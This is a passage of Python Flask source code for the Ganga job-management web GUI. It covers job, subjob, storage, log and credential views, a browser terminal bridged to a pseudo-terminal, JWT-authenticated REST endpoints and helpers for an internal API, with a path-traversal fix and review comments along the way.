                           job_id=job_id,
                           abs_path=abs_path,
                           files_info=files_info,
                           back_path=back_path)
# Subjobs view
@gui.route("/jobs/<int:job_id>/subjobs", methods=["GET", "POST"])
@login_required
def subjobs_page(job_id: int):
    """
    Tabular, paginated view of a job's subjobs.

    :param job_id: int
    """
    if request.method == "POST":
        # Persist the submitted filter/pagination choices in the session
        session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
        session["subjobs_filter"] = {
            "status": request.form.get("subjob-status"),
            "application": request.form.get("subjob-application"),
            "backend": request.form.get("subjob-backend"),
        }
    # Requested page number (defaults to the first page)
    page_arg = request.args.get("page")
    current_page = int(page_arg) if page_arg is not None else 0
    subjobs_per_page = session["subjobs_per_page"]
    try:
        subjobs_length = query_internal_api(f"/internal/jobs/{job_id}/subjobs/length", "get",
                                            params=session["subjobs_filter"])
        number_of_pages = (int(subjobs_length) // int(subjobs_per_page)) + 1
        # Clamp requests past the end to the last page
        if current_page >= number_of_pages:
            return redirect(url_for("subjobs_page", page=number_of_pages - 1, job_id=job_id))
        # Filters plus range options for the actual data query
        params = dict(session["subjobs_filter"],
                      recent=True, length=subjobs_per_page, offset=current_page)
        subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("job_page", job_id=job_id))
    return render_template("subjobs.html",
                           title=f"Subjobs - Job {job_id}",
                           status_color=status_color,
                           number_of_pages=number_of_pages,
                           current_page=current_page,
                           backends=plugins["backends"],
                           applications=plugins["applications"],
                           subjobs_info=subjobs_info,
                           job_id=job_id)
# Subjob view
@gui.route("/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@login_required
def subjob_page(job_id: int, subjob_id: int):
    """
    Detailed view of a single subjob, including stdout/stderr when present.

    :param job_id: int
    :param subjob_id: int
    """
    stdout = None
    stderr = None
    try:
        job_outputdir = query_internal_api(f"/internal/jobs/{job_id}/outputdir", "get")
        subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
        full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
        # Path of the subjob dir relative to the job dir, usable by job_browse
        job_dir_basepath = os.path.dirname(os.path.dirname(job_outputdir["outputdir"]))
        subjob_dir_basepath = os.path.dirname(os.path.dirname(subjob_info["outputdir"]))
        browse_path = subjob_dir_basepath.replace(job_dir_basepath, "")
        # Read stdout/stderr from the subjob output directory when available
        streams = {}
        for stream in ("stdout", "stderr"):
            stream_path = os.path.join(subjob_info["outputdir"], stream)
            if os.path.exists(stream_path):
                with open(stream_path) as f:
                    streams[stream] = f.read()
        stdout = streams.get("stdout")
        stderr = streams.get("stderr")
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("subjobs_page", job_id=job_id))
    return render_template("subjob.html",
                           title=f"Subjob {subjob_id} - Job {job_id}",
                           subjob_info=subjob_info,
                           status_color=status_color,
                           attribute_actions=actions["attributes"],
                           method_actions=actions["methods"],
                           stdout=stdout,
                           stderr=stderr,
                           full_print_info=full_print_info,
                           job_id=job_id,
                           browse_path=browse_path)
# Credential view
@gui.route("/credentials")
@login_required
def credentials_page():
    """
    Render the credential store view, listing credentials in a table.
    """
    try:
        # Fetch credential information from the internal API server
        credentials = query_internal_api("/internal/credentials", "get")
    except Exception as exc:
        # Report the failure on the dashboard instead of erroring out
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template('credentials.html', credential_info_list=credentials)
@gui.route("/queue", methods=["GET"])
@login_required
def queue_page():
    """
    Render the queues view with current queue information.
    """
    try:
        info = query_internal_api("/internal/queue", "get")
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template('queue.html', queue_info_list=info)
# Plugins view
@gui.route('/plugins')
@login_required
def plugins_page():
    """
    Render the plugins view listing all available plugin categories and names.
    """
    try:
        # Plugin data is kept in the module-level 'plugins' mapping
        available_plugins = plugins
    except Exception as exc:
        # Display error on the GUI
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template('plugins.html', plugins_info=available_plugins)
# Plugin view
@gui.route("/plugin/<plugin_name>")
@login_required
def plugin_page(plugin_name: str):
    """
    Render details (e.g. the docstring) for a single plugin.
    :param plugin_name: str
    """
    try:
        info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
    except Exception as exc:
        # Send the user back to the plugins list with the error shown
        flash(str(exc), "danger")
        return redirect(url_for("plugins_page"))
    return render_template("plugin.html", title=f"{plugin_name}", plugin_info=info)
# Ganga logs view
@gui.route("/logs")
@login_required
def logs_page():
    """
    Display the Ganga log file together with the GUI access and error logs.
    """
    # Paths of the three log files, read in this fixed order
    log_paths = {
        "ganga": gui.config["GANGA_LOG"],
        "access": gui.config["ACCESS_LOG"],
        "error": gui.config["ERROR_LOG"],
    }
    contents = {}
    try:
        # Slurp each log file into memory for rendering
        for key, log_path in log_paths.items():
            with open(log_path, "rt") as logfile:
                contents[key] = logfile.read()
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template("logs.html", title="Logs", ganga_log_data=contents["ganga"],
                           gui_accesslog_data=contents["access"], gui_errorlog_data=contents["error"])
@gui.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@gui.route("/storage/<path:path>", methods=["GET", "POST"])
@login_required
def storage_page(path):
    """
    A convenience feature to store some file remotely in gangadir/storage.

    GET browses the storage folder (or downloads a file); POST uploads a file
    into the currently browsed directory.
    :param path: str - path relative to the storage folder, taken from the URL
    """
    # Storage folder path
    storage_folder = gui.config["STORAGE_FOLDER"]
    # Join the storage path and the requested path
    abs_path = os.path.join(storage_folder, path)
    # SECURITY FIX: 'path' is user controlled and os.path.join() will follow
    # '..' segments or replace the base entirely when given an absolute
    # component. Resolve both sides and refuse anything escaping the sandbox.
    real_storage = os.path.realpath(storage_folder)
    real_target = os.path.realpath(abs_path)
    if real_target != real_storage and not real_target.startswith(real_storage + os.sep):
        flash("Directory does not exist.", "warning")
        return redirect(url_for("dashboard"))
    # Handle file uploads
    if request.method == "POST":
        # Uploaded file
        if "storagefile" in request.files:
            storagefile = request.files["storagefile"]
            if storagefile.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            # If valid file, then save the file
            if storagefile:
                # Target must be an existing directory inside the sandbox
                if not os.path.isdir(abs_path):
                    flash("Error while uploading the file", "danger")
                    return redirect(request.url)
                # secure_filename strips path separators and unsafe characters
                filename = secure_filename(storagefile.filename)
                save_path = os.path.join(abs_path, filename)
                storagefile.save(save_path)
                # Success message
                flash("Successfully uploaded the file.", "success")
                return redirect(request.url)
        # No file case
        flash("No file, retry!", "warning")
        return redirect(request.url)
    # URL path variable for going back
    back_path = os.path.dirname(abs_path).replace(storage_folder, "")
    # If path doesn't exist
    if not os.path.exists(abs_path):
        flash("Directory does not exist.", "warning")
        return redirect(url_for("dashboard"))
    # Check if path is a file and send
    if os.path.isfile(abs_path):
        return send_file(abs_path)
    files_info = []
    # Show directory contents
    files = os.listdir(abs_path)
    # Store directory information (name + whether it is a subdirectory)
    for file in files:
        files_info.append({
            "file": file,
            "directory": os.path.isdir(os.path.join(abs_path, file))
        })
    return render_template("storage.html", title="Storage",
                           abs_path=abs_path,
                           files_info=files_info,
                           back_path=back_path)
# Serve CLI
@gui.route("/cli")
@login_required
def serve_cli():
    """Serve the in-browser CLI page; the terminal itself is driven over the /pty socket.io namespace."""
    return render_template("cli.html")
# Establish a websocket connection from the frontend to the server
@socketio.on("connect", namespace="/pty")
def connect():
    """
    New client connected, start reading and writing from the pseudo terminal.
    """
    # Only stream terminal output when a Ganga child process exists and the
    # websocket client belongs to an authenticated GUI session.
    if gui.config["CHILD_PID"] and current_user.is_authenticated:
        # Start background reading and emitting the output of the pseudo terminal
        socketio.start_background_task(target=read_and_forward_pty_output)
    return
# Input from the frontend
@socketio.on("pty-input", namespace="/pty")
def pty_input(data):
    """
    Write to the child pty. The pty sees this as if you are typing in a real terminal.
    :param data: dict whose "input" key holds the keystrokes to forward.
    """
    # Ignore input unless the pty exists and the client is authenticated.
    if gui.config["FD"] and current_user.is_authenticated:
        os.write(gui.config["FD"], data["input"].encode())
# Resize the pseudo terminal when the frontend is resized
@socketio.on("resize", namespace="/pty")
def resize(data):
    """
    Resize the pseudo terminal according to the dimension at the frontend.
    :param data: contains information about rows and cols of the frontend terminal.
    """
    # Only resize when the pty exists and the client is authenticated.
    if gui.config["FD"] and current_user.is_authenticated:
        set_windowsize(gui.config["FD"], data["rows"], data["cols"])
# ******************** Token Based Authentication ******************** #
# Generate token for API authentication - token validity 5 days
@gui.route("/token", methods=["POST"])
def generate_token():
    """
    Validate the 'username' and 'password' supplied in the JSON request body
    and return a JSON Web Token (JWT) on success; HTTP 401 otherwise.
    """
    # Request body (tolerate a missing/empty JSON payload)
    body = request.json if request.json else {}
    username = body.get("username")
    password = body.get("password")
    # Reject the request outright when either credential is missing
    if not username or not password:
        return jsonify({"success": False, "message": "Could not verify user."}), 401
    # Look the user up and check the supplied password
    user = User.query.filter_by(user=username).first()
    if user and user.verify_password(password):
        token = user.generate_auth_token().decode("UTF-8")
        return jsonify({"token": token})
    # Wrong username or password -> 401
    return jsonify({"success": False, "message": "Could not verify user."}), 401
# ******************** Token Authentication Decorator ******************** #
# Decorator for token protected routes
def token_required(f):
    """
    Decorator for token-protected API routes.

    Validates the JWT supplied in the 'X-Access-Token' request header and, on
    success, passes the matching user as the first positional argument to the
    wrapped view. Responds with HTTP 401 when the token is missing, expired,
    invalid, or no longer maps to a known user.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        token = None
        # Extract token from headers
        if "X-Access-Token" in request.headers:
            token = request.headers["X-Access-Token"]
        if not token:
            return jsonify({"success": False, "message": "Token is missing"}), 401
        # Decode the token and subsequently identify the user
        try:
            data = jwt.decode(token, gui.config["SECRET_KEY"], algorithms=["HS256"])
            current_api_user = User.query.filter_by(public_id=data["public_id"]).first()
            if current_api_user is None:
                return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
        except jwt.ExpiredSignatureError:
            return jsonify({"success": False, "message": "Token is expired"}), 401
        except jwt.InvalidTokenError:
            return jsonify({"success": False, "message": "Token is invalid"}), 401
        except Exception:
            # FIX: narrowed from a bare 'except:' so SystemExit and
            # KeyboardInterrupt are no longer swallowed; any other decoding
            # failure still yields a 401 as before.
            return jsonify({"success": False, "message": "Could not verify token"}), 401
        return f(current_api_user, *args, **kwargs)

    return decorated
# ******************** Job API ******************** #
# Single job information API - GET Method
@gui.route("/api/jobs/<int:job_id>", methods=["GET"])
@token_required
def job_endpoint(current_api_user, job_id: int):
    """
    Return general information about the job with the given id as JSON.
    :param job_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        info = query_internal_api(f"/internal/jobs/{job_id}", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(info)
# Single job attribute information API - GET Method
@gui.route("/api/jobs/<int:job_id>/<attribute>", methods=["GET"])
@token_required
def job_attribute_endpoint(current_api_user, job_id: int, attribute: str):
    """
    Return the named attribute of the given job as JSON.
    :param job_id: int
    :param attribute: str
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        attribute_info = query_internal_api(f"/internal/jobs/{job_id}/{attribute}", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(attribute_info)
# Single job full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/full-print", methods=["GET"])
@token_required
def job_full_print_endpoint(current_api_user, job_id: int):
    """
    Return the full print of the job as JSON.
    :param job_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        full_print = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(full_print)
# Create job using template API - POST Method
@gui.route("/api/jobs/create", methods=["POST"])
@token_required
def job_create_endpoint(current_api_user):
    """
    Create a new job from an existing template.

    IMPORTANT: 'template_id' MUST be present in the JSON request body;
    'job_name' may optionally be supplied as well.
    :param current_api_user: user resolved from the request's JWT token
    """
    # Pull the creation arguments out of the JSON request body
    payload = {
        "template_id": request.json.get("template_id"),
        "job_name": request.json.get("job_name")
    }
    try:
        result = query_internal_api("/internal/jobs/create", "post", json=payload)
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# Copy job API - PUT Method
@gui.route("/api/jobs/<int:job_id>/copy", methods=["PUT"])
@token_required
def job_copy_endpoint(current_api_user, job_id: int):
    """
    Create a copy of the given job.
    :param current_api_user: user resolved from the request's JWT token
    :param job_id: int
    """
    try:
        result = query_internal_api(f"/internal/jobs/{job_id}/copy", "put")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# Job action API - PUT Method
@gui.route("/api/jobs/<int:job_id>/<action>", methods=["PUT"])
@token_required
def job_action_endpoint(current_api_user, job_id: int, action: str):
    """
    Perform 'action' on the job with the given id.

    The action may be any method or attribute change that can be applied to a
    Job object. Arguments the action needs are read from the JSON request
    body, keyed by the same name as the action. Examples:

        PUT http://localhost:5000/job/13/resubmit
            -> resubmits the job with ID 13
        PUT http://localhost:5000/job/13/force_status
            {"force_status": "failed"}
            -> forces the status of job 13; returns the error on failure
        PUT http://localhost:5000/job/13/name
            {"name": "New Name"}
            -> renames job 13 to "New Name"

    NOTE: the body MUST be sent as JSON for the request to be parsed as JSON.
    :param job_id: int
    :param action: str
    :param current_api_user: user resolved from the request's JWT token
    """
    body = request.json
    try:
        result = query_internal_api(f"/internal/jobs/{job_id}/{action}", "put", json=body)
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# Job delete API - DELETE Method
@gui.route("/api/jobs/<int:job_id>", methods=["DELETE"])
@token_required
def job_delete_endpoint(current_api_user, job_id: int):
    """
    Remove the job with the given id from the job repository.
    :param job_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        result = query_internal_api(f"/internal/jobs/{job_id}", "delete")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# Pin the Job
@gui.route("/api/jobs/<int:job_id>/pin", methods=["PUT"])
@token_required
def job_pin_endpoint(current_api_user, job_id: int):
    """
    Pin the given job, which is then shown in the dashboard.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # BUGFIX: operate on the token-authenticated user instead of Flask-Login's
    # session-bound current_user, which is anonymous (and has no 'pinned_jobs'
    # attribute) for pure API clients authenticating only with a JWT.
    u = current_api_user
    # Load pinned jobs of the user from the database (empty list when unset)
    pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
    # Pin job only if not already pinned
    if job_id not in pinned_jobs:
        pinned_jobs.append(job_id)
    # Persist the updated pin list to the database
    u.pinned_jobs = json.dumps(pinned_jobs)
    db.session.add(u)
    db.session.commit()
    return jsonify({"success": True, "message": f"Successfully pinned Job (ID={job_id})."})
# Unpin the job
@gui.route("/api/jobs/<int:job_id>/unpin", methods=["PUT"])
@token_required
def job_unpin_endpoint(current_api_user, job_id: int):
    """
    Unpin the job, and make the required change to the GUI database.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # BUGFIX: operate on the token-authenticated user instead of Flask-Login's
    # session-bound current_user, which is anonymous (and has no 'pinned_jobs'
    # attribute) for pure API clients authenticating only with a JWT.
    u = current_api_user
    # Load user's pinned jobs from the database (empty list when unset)
    pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
    # Unpin the job if it is currently pinned
    if job_id in pinned_jobs:
        pinned_jobs.remove(job_id)
    # Persist the updated pin list to the database
    u.pinned_jobs = json.dumps(pinned_jobs)
    db.session.add(u)
    db.session.commit()
    return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={job_id})."})
# ******************** Subjobs API ******************** #
# Subjobs API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs", methods=["GET"])
@token_required
def subjobs_endpoint(current_api_user, job_id: int):
    """
    Return a list of subjobs of the given job, analogous to the Jobs API.

    Supported query parameters:
    * ids: JSON string with a list of subjob IDs
    * status / application / backend: filter values (strings)
    * recent: when given, order from most recent subjob to oldest
    * length: number of subjobs to return (int)
    * offset: pages of 'length' subjobs to skip; skipped = offset * length
    :param job_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    filter_keys = ("ids", "status", "application", "backend",
                   "recent", "length", "offset")
    params = {key: request.args.get(key) for key in filter_keys}
    try:
        subjobs = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(subjobs)
# Single subjob info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@token_required
def subjob_endpoint(current_api_user, job_id: int, subjob_id: int):
    """
    Return information about a single subjob of the given job.
    :param job_id: int
    :param subjob_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(info)
# Single Subjob Attribute Info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/<attribute>", methods=["GET"])
@token_required
def subjob_attribute_endpoint(current_api_user, job_id: int, subjob_id: int, attribute: str):
    """
    Return the named attribute of the given subjob as JSON.
    :param job_id: int
    :param subjob_id: int
    :param attribute: str
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        attribute_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/{attribute}", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(attribute_info)
# Single subjob full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/full-print", methods=["GET"])
@token_required
def subjob_full_print_endpoint(current_api_user, job_id: int, subjob_id: int):
    """
    Return the full print of the subjob as JSON.
    :param subjob_id: int
    :param job_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        full_print = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(full_print)
# Copy subjob API - PUT Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/copy", methods=["PUT"])
@token_required
def subjob_copy_endpoint(current_api_user, job_id: int, subjob_id: int):
    """
    Copy the given subjob into a new job.
    :param job_id: int
    :param subjob_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        result = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/copy", "put")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# ******************** Jobs API ******************** #
# Jobs API - GET Method
@gui.route("/api/jobs", methods=["GET"])
@token_required
def jobs_endpoint(current_api_user):
    """
    Return a list of jobs with general information in JSON format.

    Supported query parameters:
    * ids: JSON string with a list of job IDs
    * status / application / backend: filter values (strings)
    * recent: when given, order from most recent job to oldest
    * length: number of jobs to return (int)
    * offset: pages of 'length' jobs to skip; skipped = offset * length
    * auto-validate-ids: skip requested ids missing from the job repository
    :param current_api_user: user resolved from the request's JWT token
    """
    filter_keys = ("ids", "status", "application", "backend",
                   "recent", "length", "offset", "auto-validate-ids")
    params = {key: request.args.get(key) for key in filter_keys}
    try:
        # Fetch jobs matching the select and range filters
        jobs = query_internal_api("/internal/jobs", "get", params=params)
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(jobs)
# Jobs statistics API - GET Method
@gui.route("/api/jobs/statistics", methods=["GET"])
@token_required
def jobs_statistics_endpoint(current_api_user):
    """
    Return the number of jobs in new, running, completed, killed and failed states.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        stats = query_internal_api("/internal/jobs/statistics", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(stats)
@gui.route("/api/queue", methods=["GET"])
@token_required
def queue_endpoint(current_api_user):
    """
    Return information about Ganga's worker queues as JSON.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        info = query_internal_api("/internal/queue", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(info)
@gui.route("/api/queue/chart", methods=["GET","POST"])
def queue_chart_endpoint():
    """Return queue chart data as a raw JSON response for the frontend chart."""
    # NOTE(review): this endpoint carries neither @token_required nor
    # @login_required, so queue data is served unauthenticated — confirm this
    # is intentional. POST is accepted but the request body is never read.
    chart_info = query_internal_api("/internal/queue/data", "get")
    response = make_response(json.dumps(chart_info))
    response.content_type = 'application/json'
    return response
# Job incomplete ids API - GET Method
@gui.route("/api/jobs/incomplete_ids", methods=["GET"])
@token_required
def jobs_incomplete_ids_endpoint(current_api_user):
    """
    Return the list of incomplete job ids as JSON.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        incomplete_ids = query_internal_api("/internal/jobs/incomplete-ids", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(incomplete_ids)
# ******************** Config API ******************** #
# Config API - GET Method
@gui.route("/api/config", methods=["GET"], defaults={"section": ""})
@gui.route("/api/config/<section>", methods=["GET"])
@token_required
def config_endpoint(current_api_user, section: str):
    """
    Return configuration information as JSON: every section with its options
    and values, or a single section when one is named in the URL.
    :param section: str - empty string means "all sections"
    :param current_api_user: user resolved from the request's JWT token
    """
    # Pick the internal route depending on whether a section was requested
    route = f"/internal/config/{section}" if section != "" else "/internal/config"
    try:
        config_info = query_internal_api(route, "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(config_info)
# ******************** Templates API ******************** #
# Templates API - GET Method
@gui.route("/api/templates", methods=["GET"])
@token_required
def templates_endpoint(current_api_user):
    """
    Return a list of objects containing template information as JSON.

    Supported query parameters:
    * application / backend: filter values (strings)
    * recent: when given, order from most recent template to oldest
    * length: number of templates to return (int)
    * offset: pages of 'length' templates to skip; skipped = offset * length
    :param current_api_user: user resolved from the request's JWT token
    """
    filter_keys = ("application", "backend", "recent", "length", "offset")
    params = {key: request.args.get(key) for key in filter_keys}
    try:
        templates = query_internal_api("/internal/templates", "get", params=params)
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(templates)
# Single template full print API - GET Method
@gui.route("/api/templates/<int:template_id>/full-print", methods=["GET"])
@token_required
def template_full_print_endpoint(current_api_user, template_id: int):
    """
    Return the full print of the template as JSON.
    :param template_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        full_print = query_internal_api(f"/internal/templates/{template_id}/full-print", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(full_print)
# Template API - DELETE Method
@gui.route("/api/templates/<int:template_id>", methods=["DELETE"])
@token_required
def delete_template_endpoint(current_api_user, template_id: int):
    """
    Delete the template with the given id from the template repository.
    :param template_id: int
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        result = query_internal_api(f"/internal/templates/{template_id}", "delete")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# ******************** Credentials API ******************** #
# Credential store API - GET Method
@gui.route("/api/credentials", methods=["GET"])
@token_required
def credentials_endpoint(current_api_user):
    """
    Return the list of credentials and their information as JSON.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        credentials = query_internal_api("/internal/credentials", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(credentials)
# Credential Store API - PUT Method - Renew all credentials
@gui.route("/api/credentials/renew", methods=["PUT"])
@token_required
def credentials_renew_endpoint(current_api_user):
    """
    Renew every credential in the credential store.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        result = query_internal_api("/internal/credentials/renew", "put")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(result)
# ******************** Job Tree API ******************** #
# Job tree API - GET Method
@gui.route("/api/jobtree", methods=["GET"])
@token_required
def jobtree_endpoint(current_api_user):
    """
    Return the job tree folder structure as a JSON-encoded dict.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        jobtree = query_internal_api("/internal/jobtree", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(jobtree)
# ******************** Job Tree API ******************** #
# Plugins API - GET Method
@gui.route("/api/plugins", methods=["GET"])
@token_required
def plugins_endpoint(current_api_user):
    """
    Return plugin information: categories and the plugin names in each category.
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        plugin_list = query_internal_api("/internal/plugins", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(plugin_list)
# Plugin API - GET Method
@gui.route("/api/plugins/<plugin_name>", methods=["GET"])
@token_required
def plugin_endpoint(current_api_user, plugin_name: str):
    """
    Return information about a single plugin, e.g. its name and docstring.
    :param plugin_name: str
    :param current_api_user: user resolved from the request's JWT token
    """
    try:
        info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
    except Exception as exc:
        return jsonify({"success": False, "message": str(exc)}), 400
    return jsonify(info)
# ******************** Helper Functions ******************** #
# Validate uploaded filename.
def allowed_file(filename):
    """Return True when *filename* has an extension listed in ALLOWED_EXTENSIONS."""
    parts = filename.rsplit(".", 1)
    return len(parts) == 2 and parts[1].lower() in ALLOWED_EXTENSIONS
# Make HTTP request to the Internal Flask Server which is running on a GangaThread which has access to ganga namespace.
def query_internal_api(route: str, method: str, **kwargs):
    """
    Perform an HTTP request against the internal API Flask server (which runs
    on a GangaThread with access to the ganga namespace) and return the
    decoded JSON payload.

    :param route: str - endpoint path, e.g. "/internal/jobs"
    :param method: str - one of "get", "post", "put", "delete"
    :param kwargs: dict - forwarded to the requests call (params, json, ...)
    :return: dict
    :raises Exception: when the method is unsupported, or the server responds
        with a non-200 status (its "message" field is re-raised).
    """
    # The internal server listens on localhost at the configured port
    internal_url = f"http://localhost:{gui.config['INTERNAL_PORT']}"
    # Refuse HTTP verbs the internal API does not support
    if method not in ("get", "post", "put", "delete"):
        raise Exception(f"Unsupported method: {method}")
    # Dispatch the request via the matching requests.<method> function
    response = getattr(requests, method)(internal_url + route, **kwargs)
    # Anything other than 200 is treated as a failure
    if response.status_code != 200:
        raise Exception(response.json().get("message"))
    return response.json()
def create_session_defaults():
    """
    Populate missing per-user session keys with their default values
    (page sizes and filter selections for templates, jobs and subjobs).
    """
    defaults = {
        "templates_per_page": 10,
        "templates_filter": {key: "any" for key in ["application", "backend"]},
        "jobs_per_page": 10,
        "jobs_filter": {key: "any" for key in ["status", "application", "backend"]},
        "subjobs_per_page": 10,
        "subjobs_filter": {key: "any" for key in ["status", "application", "backend"]},
    }
    # Only set keys the session does not already carry
    for key, value in defaults.items():
        if key not in session:
            session[key] = value
# Ping internal API server
def ping_internal():
    """
    Poll the Internal API server until it answers a ping.

    Retries every 2 seconds for up to 20 attempts (~40 s), which covers
    the time Ganga typically needs to boot up.

    :return: bool - True as soon as the server answers the ping with True,
        False if it never comes online within the retry budget.
    """
    # Bug fixes vs. the previous version:
    #  * a bare ``except:`` also swallowed KeyboardInterrupt/SystemExit;
    #  * the retry counter and the sleep only ran on exceptions, so a
    #    server that responded with anything other than True caused an
    #    infinite busy loop.  Every attempt now counts and sleeps.
    trials = 0
    while trials <= 20:
        try:
            # Raises if the server is unreachable or returns non-200.
            if query_internal_api("/ping", "get") is True:
                return True
        except Exception:
            print("Internal API server not online (mostly because Ganga is booting up), retrying...")
        time.sleep(2)
        trials += 1
    return False
def start_ganga(internal_port: int, args: str = ""):
    """
    Start a ganga session in a pseudo terminal and stores the file descriptor of the terminal as well as the PID of the ganga session.
    :param args: str - str of arguments to provide to ganga
    :param internal_port: int
    """
    # Create child process attached to a pty that we can read from and write to
    (child_pid, fd) = pty.fork()
    if child_pid == 0:
        # This is the child process fork. Anything printed here will show up in the pty, including the output of this subprocess
        # Pass the web-CLI flag and the internal API port to ganga via the
        # environment so the spawned session knows how to reach this server.
        ganga_env = os.environ.copy()
        ganga_env["WEB_CLI"] = "True"
        ganga_env["INTERNAL_PORT"] = str(internal_port)
        # shell=True so the extra `args` string is word-split by the shell.
        # NOTE(review): after subprocess.run returns, the child fork falls
        # through and keeps executing the parent program's code — consider
        # an explicit os._exit() here; confirm intended behavior.
        subprocess.run(f"ganga --webgui {args}", shell=True, env=ganga_env)
    else:
        # This is the parent process fork. Store fd (connected to the child’s controlling terminal) and child pid
        # These config entries are read by the pty input/output handlers.
        gui.config["FD"] = fd
        gui.config["CHILD_PID"] = child_pid
        # Give the terminal an initial 50x50 size until the frontend resizes it.
        set_windowsize(fd, 50, 50)
        print("Ganga started, PID: ", child_pid)
# Set the window size of the pseudo terminal according to the size in the frontend
def set_windowsize(fd, row, col, xpix=0, ypix=0):
    """
    Resize the pseudo terminal behind *fd* to ``row`` x ``col`` characters.

    :param fd: int - file descriptor of the pty
    :param row: int - number of character rows
    :param col: int - number of character columns
    :param xpix: int - terminal width in pixels (0 = unspecified)
    :param ypix: int - terminal height in pixels (0 = unspecified)
    """
    # TIOCSWINSZ expects a packed `struct winsize` of four unsigned shorts.
    packed_size = struct.pack("HHHH", row, col, xpix, ypix)
    fcntl.ioctl(fd, termios.TIOCSWINSZ, packed_size)
# Read and forward that data from the pseudo terminal to the frontend
def read_and_forward_pty_output():
    """
    Background task: stream output from the ganga pty to the frontend.

    Polls the pty file descriptor stored in ``gui.config["FD"]`` and emits
